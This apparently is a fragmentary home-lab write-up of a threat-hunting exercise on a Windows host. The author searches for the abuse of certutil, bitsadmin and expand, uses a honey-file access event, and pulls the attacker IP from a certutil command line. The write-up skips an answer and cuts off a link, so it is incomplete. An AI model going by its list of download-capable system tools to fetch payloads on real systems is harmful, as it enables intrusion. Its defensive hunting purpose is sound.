To catch a hacker in my home lab
After checking the website I decided to look for certutil, bitsadmin and expand, but there are more that could have been used. Now lets move onto question two: How did the attacker escalate privileges? Hint: Look for an event that fires when a honey file is accessed. So looking at my hint I need to find an event that fires when a file is accessed. So all you would have to do is, if you didn't know which event to look for, is do a quick search for "Windows event id file access" and this site was first to pop up: https://www. Answer 3: 10.0.0.72, this was answered by looking at the IP address in the certutil commandline. We are looking for executables that have users in the commandline and not onedrive. We are looking for executables running in user space which we found with p.exe.